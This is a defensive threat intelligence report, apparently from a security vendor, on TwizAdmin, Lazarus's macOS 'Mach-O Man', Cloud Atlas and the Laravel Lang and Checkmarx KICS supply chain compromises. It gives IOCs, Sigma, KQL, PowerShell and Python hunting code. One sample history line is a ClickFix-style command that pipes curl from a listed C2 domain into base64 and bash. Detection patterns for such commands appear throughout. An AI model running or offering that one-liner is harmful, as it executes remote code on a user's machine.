Threat Summary
Recent intelligence from OTX pulses indicates a convergence of high-impact credential theft operations targeting both endpoints and the software supply chain. The landscape is dominated by the DataBreachPlus group deploying the TwizAdmin Malware-as-a-Service (MaaS) suite, which couples cryptocurrency clipping with ransomware capabilities. Simultaneously, Lazarus Group has intensified operations against the financial sector using the "Mach-O Man" macOS malware via ClickFix social engineering.
Parallel to these direct attacks, Cloud Atlas (Inception Framework) is actively targeting government entities in Russia and Belarus with updated tooling (PowerCloud, VBCloud), while a separate supply chain campaign has compromised critical developer tools, specifically Laravel Lang packages and the official Checkmarx KICS Docker images. These supply chain intrusions facilitate the deployment of webshells (helpers.php) and information stealers (mcpAddon.js), creating a broad attack surface for credential harvesting.
Threat Actor / Malware Profile
1. TwizAdmin (DataBreachPlus)
- Type: Malware-as-a-Service (MaaS)
- Malware Families: TwizAdmin, crpx0 (ransomware)
- Distribution: Phishing campaigns impersonating logistics/shipping providers (FedEx).
- Behavior: Multi-stage payload that starts as a clipper for 8+ cryptocurrency chains. Exfiltrates BIP-39 seed phrases and browser credentials.
- C2: FastAPI-based panel; observed C2 at `103.241.66[.]238:1337`.
- Persistence: Scheduled tasks and registry Run keys.
2. Mach-O Man (Lazarus Group)
- Type: APT / Cyber-Espionage
- Malware Families: Mach-O Man, PyLangGhostRAT
- Distribution: ClickFix attacks via fake meeting invites on Telegram.
- Behavior: Prompts users to execute terminal commands impersonating software updates (Zoom/Teams). Steals browser data and system info.
- Exfiltration: Uses Telegram for C2 communication.
3. Cloud Atlas (Inception Framework)
- Type: APT
- Target: Government entities in Russia/Belarus.
- Malware Families: PowerCloud, VBCloud, PowerShower
- Behavior: Delivered via phishing ZIPs containing malicious LNK shortcuts. PowerCloud exfiltrates data to C2; PowerShower performs network reconnaissance.
4. Supply Chain Actors (Laravel & KICS)
- Laravel Lang: Backdoored `helpers.php` files providing RCE and information stealing.
- Checkmarx KICS: Poisoned Docker Hub images (tags `v2.1.20`, `v2.1.21`, `alpine`) and VS Code extension versions (`1.17.0`, `1.19.0`) deploying `mcpAddon.js` and the Canister Worm.
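The ClickFix lure in profile 2 ends with the victim pasting a terminal command, which leaves a trace in shell history. The hunt below is an added example for this page, not Lazarus tooling or a vendor product: it scores each history line with heuristics for the ClickFix pattern (a download piped into an interpreter, inline base64 decoding, detached execution or quarantine removal, plus a Zoom/Teams/update lure string). The heuristics and the history lines in `SAMPLE_HISTORY` are assumptions constructed for the demo, not indicators from the pulses.

```python
"""Hunt macOS/Linux shell history for ClickFix-style paste-and-run commands.

Added example for this page (not Lazarus tooling or a vendor product). The
heuristics below are assumptions about the ClickFix pattern described above, a
download-and-execute one-liner dressed up as a Zoom/Teams update, not indicators
taken from the pulses. The history lines in SAMPLE_HISTORY are constructed.
"""
import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Lure strings a user is told the command is for (assumed, extend as needed).
LURE_WORDS = ("zoom", "teams", "update", "meeting", "fix")
# Download piped into an interpreter: curl/wget ... | sh|bash|zsh|python
FETCH_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|zsh|python3?)\b")
# Inline base64 decoding (-D is the macOS flag, -d/--decode on coreutils)
B64_RE = re.compile(r"\bbase64\b\s+(-d|--decode|-D)\b")
# Detached execution, AppleScript dialogs, or Gatekeeper quarantine removal
HIDE_RE = re.compile(r"\b(nohup|osascript|xattr\s+-d\s+com\.apple\.quarantine)\b")


@dataclass
class Hit:
    line_no: int
    command: str
    reasons: tuple


def score_command(cmd: str) -> tuple:
    """Return the heuristic reasons a single shell command looks like ClickFix."""
    reasons = []
    if FETCH_RE.search(cmd):
        reasons.append("download piped to interpreter")
    if B64_RE.search(cmd):
        reasons.append("base64 decode in command")
    if HIDE_RE.search(cmd):
        reasons.append("quarantine bypass or detached execution")
    # A lure word alone is noise ("brew update"); only count it alongside another signal.
    if reasons and any(w in cmd.lower() for w in LURE_WORDS):
        reasons.append("software-update lure string")
    return tuple(reasons)


def parse_history(text: str):
    """Yield (line_no, command) for zsh extended history (': epoch:dur;cmd') or plain bash history."""
    for n, raw in enumerate(text.splitlines(), 1):
        m = re.match(r"^: \d+:\d+;(.*)$", raw)
        yield n, (m.group(1) if m else raw)


def hunt(text: str, min_reasons: int = 2) -> list:
    """Return Hit objects for commands that trip at least min_reasons heuristics."""
    hits = []
    for n, cmd in parse_history(text):
        reasons = score_command(cmd)
        if len(reasons) >= min_reasons:
            hits.append(Hit(n, cmd, reasons))
    return hits


# Constructed sample: benign commands, one ClickFix one-liner, one dialog lure.
SAMPLE_HISTORY = """\
: 1716700000:0;ls -la
: 1716700010:0;brew update && brew upgrade
: 1716700020:0;echo 'Zoom update' && curl -fsSL http://livemicrosft.com/fix | base64 -d | bash
: 1716700030:0;git pull
: 1716700040:0;nohup osascript -e 'display dialog "Teams update"' &
"""

if __name__ == "__main__":
    # Usage: python clickfix_hunt.py [~/.zsh_history]; with no argument the sample is scanned.
    text = Path(sys.argv[1]).expanduser().read_text(errors="replace") if len(sys.argv) > 1 else SAMPLE_HISTORY
    for h in hunt(text):
        print(f"line {h.line_no}: {h.command}\n    reasons: {', '.join(h.reasons)}")
```

The threshold of two signals is what keeps `brew update` and a plain `curl ... | sh` install script out of the results; lower `min_reasons` to 1 for a noisier sweep across a fleet, and feed it `~/.zsh_history` (zsh extended format) or `~/.bash_history` from the macOS endpoints in scope.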
IOC Analysis
Indicator types and operationalization:
- Domains: Several newly registered domains serve C2 and payload delivery (`fanonlyatn.xyz`, `livemicrosft.com`, `flipboxstudio.info`). SOC teams should block these immediately at the proxy/DNS level and add them to threat intelligence feeds.
- File hashes: A mix of SHA256 (Windows/macOS binaries) and MD5 (legacy components). Load these into EDR solutions for quarantine and hunting.
- IPs: The Cloud Atlas addresses (`46.17.44.125`, `195.58.49.9`) and the TwizAdmin C2 (`103.241.66[.]238`) should be blocked at perimeter firewalls.
Tooling:
- Network analysis: The TwizAdmin C2 panel is FastAPI-based; in Zeek/Wireshark, filter for HTTP with JSON bodies on non-standard ports (e.g., 1337), since a JSON API over plain HTTP outside the usual web ports is uncommon on most endpoints.
- Hunting: Use YARA rules matching the specific binary structures of Mach-O Man and the PowerCloud PowerShell scripts.
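The domain, IP and "JSON over an odd port" checks above can be run together over Zeek output. The script below is an added example (not Zeek scripting and not part of the pulses): it refangs the defanged indicators from this report, matches `conn.log`/`http.log` records against them, and flags HTTP with `application/json` bodies on a port outside `STANDARD_HTTP_PORTS`. It expects JSON-formatted Zeek logs with a `_path` field per line, as the json-streaming-logs package writes them; the records in `SAMPLE_LOGS` and the port whitelist are constructed assumptions.

```python
"""Run this page's network IOCs and the FastAPI-on-odd-port heuristic over Zeek JSON logs.

Added example (not Zeek's own scripting or the pulse content). It expects Zeek
logs in JSON with a "_path" field per line, as the json-streaming-logs package
writes them; the records in SAMPLE_LOGS are constructed. STANDARD_HTTP_PORTS is an
assumption to tune per environment.
"""
import json

# IOCs as listed in this report; defanged forms are accepted and normalised.
IOC_IPS = {"103.241.66[.]238", "46.17.44.125", "195.58.49.9"}
IOC_DOMAINS = {"fanonlyatn.xyz", "livemicrosft.com", "flipboxstudio.info",
               "allgoodsdirect.com.au", "istochnik.org"}
STANDARD_HTTP_PORTS = {80, 443, 8000, 8080, 8443}  # assumption


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('103.241.66[.]238', 'hxxp://') back into its live form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOC_IPS_LIVE = {refang(ip) for ip in IOC_IPS}


def domain_matches(host: str) -> bool:
    """Exact or subdomain match against the IOC domains (case-insensitive, trailing dot ignored)."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def check_record(rec: dict) -> list:
    """Return the reasons one conn.log or http.log record should be escalated."""
    reasons = []
    if rec.get("id.resp_h") in IOC_IPS_LIVE:
        reasons.append("dest IP in IOC list")
    if rec.get("_path") == "http":
        if domain_matches(rec.get("host", "")):
            reasons.append("Host header in IOC domain list")
        # TwizAdmin's panel is FastAPI: JSON bodies over plain HTTP on a port such as 1337.
        mimes = set(rec.get("orig_mime_types") or []) | set(rec.get("resp_mime_types") or [])
        if rec.get("id.resp_p") not in STANDARD_HTTP_PORTS and "application/json" in mimes:
            reasons.append("JSON over HTTP on non-standard port (FastAPI panel pattern)")
    return reasons


def hunt(log_lines: str) -> dict:
    """Map Zeek uid -> reasons for every record that matched at least one check."""
    hits = {}
    for line in log_lines.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        reasons = check_record(rec)
        if reasons:
            hits[rec["uid"]] = reasons
    return hits


# Constructed records: C1 domain hit, C2 TwizAdmin panel, C3 benign internal API,
# C4 Cloud Atlas IP, C5 benign.
SAMPLE_LOGS = "\n".join(json.dumps(r) for r in [
    {"_path": "http", "uid": "C1", "id.orig_h": "10.0.0.5", "id.resp_h": "198.51.100.10",
     "id.resp_p": 80, "method": "GET", "host": "cdn.livemicrosft.com", "uri": "/update.zip"},
    {"_path": "http", "uid": "C2", "id.orig_h": "10.0.0.5", "id.resp_h": "103.241.66.238",
     "id.resp_p": 1337, "method": "POST", "host": "103.241.66.238", "uri": "/api/clip",
     "orig_mime_types": ["application/json"], "resp_mime_types": ["application/json"]},
    {"_path": "http", "uid": "C3", "id.orig_h": "10.0.0.7", "id.resp_h": "203.0.113.8",
     "id.resp_p": 8080, "method": "GET", "host": "intranet.example", "uri": "/api/health",
     "resp_mime_types": ["application/json"]},
    {"_path": "conn", "uid": "C4", "id.orig_h": "10.0.0.9", "id.resp_h": "46.17.44.125",
     "id.resp_p": 443, "proto": "tcp"},
    {"_path": "conn", "uid": "C5", "id.orig_h": "10.0.0.9", "id.resp_h": "93.184.216.34",
     "id.resp_p": 443, "proto": "tcp"},
])

if __name__ == "__main__":
    for uid, reasons in hunt(SAMPLE_LOGS).items():
        print(uid, "->", "; ".join(reasons))
```

The subdomain match matters because the report lists registrable domains while the Host header will often carry a subdomain; the port heuristic is deliberately separate from the IOC match so that a rehosted TwizAdmin panel on a fresh IP still surfaces, at the cost of internal JSON APIs on unusual ports, which is why the port whitelist is meant to be tuned.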
Detection Engineering
The following detection logic targets the execution chains, C2 patterns and supply chain artifacts identified in the pulses. The Sigma rules are scoped to Windows telemetry (Sysmon/EDR file, process and network events); Laravel deployments on Linux need equivalent file-integrity or auditd coverage for the helpers.php check.
```yaml
title: Potential Laravel helpers.php Backdoor Creation
id: 9d8f7a6b-c5d4-4e3f-8a2b-1c9d0e8f7a6b
description: Detects the creation or modification of helpers.php in web directories, a pattern associated with the Laravel Lang compromise.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: file_event
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\\vendor\\laravel-lang\\'
      - '\\lang\\'
    TargetFilename|endswith:
      - '\\helpers.php'
  condition: selection
falsepositives:
  - Legitimate developer updates to language files
level: high
```

```yaml
title: Suspicious PowerShell Command Line Encoded
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects encoded PowerShell command lines often used by Cloud Atlas and TwizAdmin for initial payload execution.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\\powershell.exe'
      - '\\pwsh.exe'
    CommandLine|contains:
      - ' -enc '
      - ' -EncodedCommand '
      - 'FromBase64String'
  condition: selection
falsepositives:
  - System administration scripts
level: medium
```

```yaml
title: TwizAdmin or Mach-O Man C2 Domain Connection
id: 7f8e9d0c-1b2a-3c4d-5e6f-7a8b9c0d1e2f
description: Detects network connections to known C2 domains associated with TwizAdmin and Lazarus Mach-O Man campaigns.
status: experimental
date: 2026/05/26
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationHostname|contains:
      - 'fanonlyatn.xyz'
      - 'livemicrosft.com'
      - 'flipboxstudio.info'
      - 'allgoodsdirect.com.au'
      - 'istochnik.org'
  condition: selection
falsepositives:
  - Rare, unlikely legitimate traffic
tags:
  - c2
  - infostealer
level: critical
```
**KQL (Microsoft Sentinel)**

Sentinel runs one tabular expression per query, so the file hash hunt and the network hunt are two separate queries. The hash list mixes SHA256 and MD5 values, and the comparison is case-insensitive because the pulses publish lowercase hashes while the `DeviceFileEvents` columns may not be.

```kql
// Hunt 1: file hash IOCs across DeviceFileEvents (SHA256 and MD5 from the pulses)
let MalwareHashes = dynamic([
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "d47de3772f2d61a043e7047431ef4cf4"
]);
DeviceFileEvents
| where SHA256 in~ (MalwareHashes) or MD5 in~ (MalwareHashes)
| project Timestamp, DeviceName, FileName, FolderPath, SHA256, MD5, InitiatingProcessAccountName
| extend Alert = "Malware File Hash Detected"
```

```kql
// Hunt 2: network IOCs (C2 domains and IPs) across DeviceNetworkEvents
// has_any matches the domain anywhere in RemoteUrl, which may carry a full URL or a subdomain
let C2Domains = dynamic(["fanonlyatn.xyz", "livemicrosft.com", "flipboxstudio.info", "allgoodsdirect.com.au", "istochnik.org"]);
let C2IPs = dynamic(["103.241.66.238", "46.17.44.125", "195.58.49.9"]);
DeviceNetworkEvents
| where RemoteUrl has_any (C2Domains) or RemoteIP in (C2IPs)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
| extend Alert = "C2 Communication Detected"
```
**PowerShell Hunt Script**

```powershell
# IOC Hunter for TwizAdmin, Mach-O Man, and KICS artifacts
# Requires Administrator privileges for full file system access
# The hash list mixes SHA256 (64 hex chars) and MD5 (32 hex chars) from the pulses,
# so every file is hashed with both algorithms. -contains compares case-insensitively.
$TargetHashes = @(
    "06299676b43749b8477c4bc977c09512957fc9b66fd5030c1874069632ce6092",
    "3fcd267e811d9b83cafa3d8d6932fa1c56f4fd8dcf46f9ec346e0689439532d4",
    "0f41fd82cac71e27c36eb90c0bf305d6006b4f3d59e8ba55faeacbe62aadef90",
    "d47de3772f2d61a043e7047431ef4cf4",
    "222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b"
)
# PowerShell does not treat backslash as an escape character, so paths use single backslashes
$ScanPaths = @("C:\Users\", "C:\ProgramData\", "C:\inetpub\wwwroot\")

Write-Host "[!] Starting IOC scan for credential theft malware..." -ForegroundColor Cyan
foreach ($Path in $ScanPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        # -File skips directories, which have no Length and cannot be hashed
        Get-ChildItem -Path $Path -File -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $File = $_
            if ($File.Length -gt 0) {
                try {
                    $Sha256 = (Get-FileHash -Path $File.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                    $Md5    = (Get-FileHash -Path $File.FullName -Algorithm MD5 -ErrorAction Stop).Hash
                    if (($TargetHashes -contains $Sha256) -or ($TargetHashes -contains $Md5)) {
                        Write-Host "[!] MALICIOUS FILE FOUND: $($File.FullName)" -ForegroundColor Red
                        Write-Host "    SHA256: $Sha256" -ForegroundColor Red
                        Write-Host "    MD5:    $Md5" -ForegroundColor Red
                    }
                } catch {
                    # Ignore files that are locked or not readable by this account
                }
            }
        }
    }
}

# Check for Laravel compromise artifacts: every helpers.php under a web root is listed with
# its hash so it can be compared against the published laravel-lang release.
$WebRoots = @("C:\inetpub\", "C:\xampp\", "C:\wamp64\")
Write-Host "[*] Checking for Laravel helpers.php backdoors..." -ForegroundColor Yellow
foreach ($Root in $WebRoots) {
    if (Test-Path $Root) {
        Get-ChildItem -Path $Root -File -Filter "helpers.php" -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            Write-Host "[!] Suspicious helpers.php found: $($_.FullName) (SHA256: $Hash)" -ForegroundColor Yellow
        }
    }
}
Write-Host "[*] Scan Complete." -ForegroundColor Green
```
Response Priorities
- Immediate: Block all IOCs (domains `fanonlyatn.xyz`, `livemicrosft.com`; IPs `46.17.44.125`, `103.241.66.238`) at perimeter firewalls and proxies. Quarantine endpoints with file hash matches.
- 24h: Force password resets for developer accounts (Laravel/KICS compromise) and for users with access to cryptocurrency wallets (TwizAdmin). Initiate credential stuffing checks.
- 1 week: Audit the Docker Hub images and VS Code extensions in use. Validate the integrity of Laravel language packages (`laravel-lang/lang`). Review macOS endpoint security against ClickFix social engineering vectors.
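The one-week audit can be scripted from inventory the tools already produce. The script below is an added example (not Checkmarx, Laravel Lang or Docker tooling): it parses `docker image ls --format '{{json .}}'` and `code --list-extensions --show-versions` output, flags the poisoned KICS tags and extension versions named in this report, and lists every `helpers.php` under a `laravel-lang` or `lang` directory with its SHA256 for comparison against the published release. Matching the image repository and extension id on the substring "kics" is an assumption, since the report names the product but not the exact identifiers; all sample inputs, including the placeholder extension id, are constructed.

```python
"""Audit Docker images, VS Code extensions and Laravel vendor trees for the supply chain
artifacts named in this report.

Added example (not Checkmarx, Laravel Lang or Docker tooling). The poisoned KICS tags and
extension versions come from the report; matching the image repository and extension id
on the substring "kics" is an assumption, because the report names the product, not the
exact identifiers. All sample inputs are constructed.
"""
import hashlib
import json
import pathlib
import re
import tempfile

BAD_KICS_IMAGE_TAGS = {"v2.1.20", "v2.1.21", "alpine"}
BAD_KICS_EXT_VERSIONS = {"1.17.0", "1.19.0"}


def audit_docker_images(docker_ls_json: str) -> list:
    """Input: `docker image ls --format '{{json .}}'` output, one JSON object per line."""
    findings = []
    for line in docker_ls_json.splitlines():
        if not line.strip():
            continue
        img = json.loads(line)
        repo, tag = img.get("Repository", ""), img.get("Tag", "")
        if "kics" in repo.lower() and tag in BAD_KICS_IMAGE_TAGS:
            findings.append(f"docker image {repo}:{tag} (ID {img.get('ID')}) is a poisoned KICS tag")
    return findings


def audit_vscode_extensions(listing: str) -> list:
    """Input: `code --list-extensions --show-versions` output, `publisher.name@version` per line."""
    findings = []
    for line in listing.splitlines():
        m = re.match(r"^([\w.-]+)@(\S+)$", line.strip())
        if not m:
            continue
        ext_id, version = m.groups()
        if "kics" in ext_id.lower() and version in BAD_KICS_EXT_VERSIONS:
            findings.append(f"VS Code extension {ext_id}@{version} is a poisoned KICS build")
    return findings


def find_laravel_lang_helpers(root) -> list:
    """Return (path, sha256) for every helpers.php under a laravel-lang or lang directory.

    Presence is expected for the legitimate package, so the hash is what gets compared
    against the published release; the report gives no hash for the backdoored file."""
    out = []
    for p in sorted(pathlib.Path(root).rglob("helpers.php")):
        parts = {x.lower() for x in p.parts}
        if "laravel-lang" in parts or "lang" in parts:
            out.append((str(p), hashlib.sha256(p.read_bytes()).hexdigest()))
    return out


# Constructed inputs: one poisoned image, one clean image, an unrelated alpine image.
SAMPLE_DOCKER = "\n".join(json.dumps(r) for r in [
    {"Repository": "checkmarx/kics", "Tag": "v2.1.21", "ID": "a1b2c3d4e5f6"},
    {"Repository": "checkmarx/kics", "Tag": "v2.1.19", "ID": "0f0f0f0f0f0f"},
    {"Repository": "nginx", "Tag": "alpine", "ID": "beefbeefbeef"},
])
# Extension ids here are placeholders, not the real marketplace identifier.
SAMPLE_EXTENSIONS = """\
example-publisher.kics@1.19.0
ms-python.python@2024.4.1
example-publisher.kics@1.18.0
"""


def demo_laravel_scan() -> list:
    """Scan a constructed project tree: app/helpers.php (ignored) and a vendor laravel-lang copy."""
    with tempfile.TemporaryDirectory() as tmp:
        app = pathlib.Path(tmp, "app", "helpers.php")
        app.parent.mkdir(parents=True)
        app.write_text("<?php // application helpers\n")
        pkg = pathlib.Path(tmp, "vendor", "laravel-lang", "lang", "src", "helpers.php")
        pkg.parent.mkdir(parents=True)
        pkg.write_text("<?php // package helpers\n")
        return find_laravel_lang_helpers(tmp)


if __name__ == "__main__":
    for f in audit_docker_images(SAMPLE_DOCKER) + audit_vscode_extensions(SAMPLE_EXTENSIONS):
        print("[!]", f)
    for path, digest in demo_laravel_scan():
        print("[*] review", path, digest)
```

The `nginx:alpine` record is the reason the tag check is gated on the repository name: `alpine` is a poisoned tag only for the KICS image, not a signal on its own. The Laravel scan deliberately reports rather than judges, because the report identifies the backdoored file by name and location but not by hash, so the comparison against a known-good package release has to be done by the reviewer.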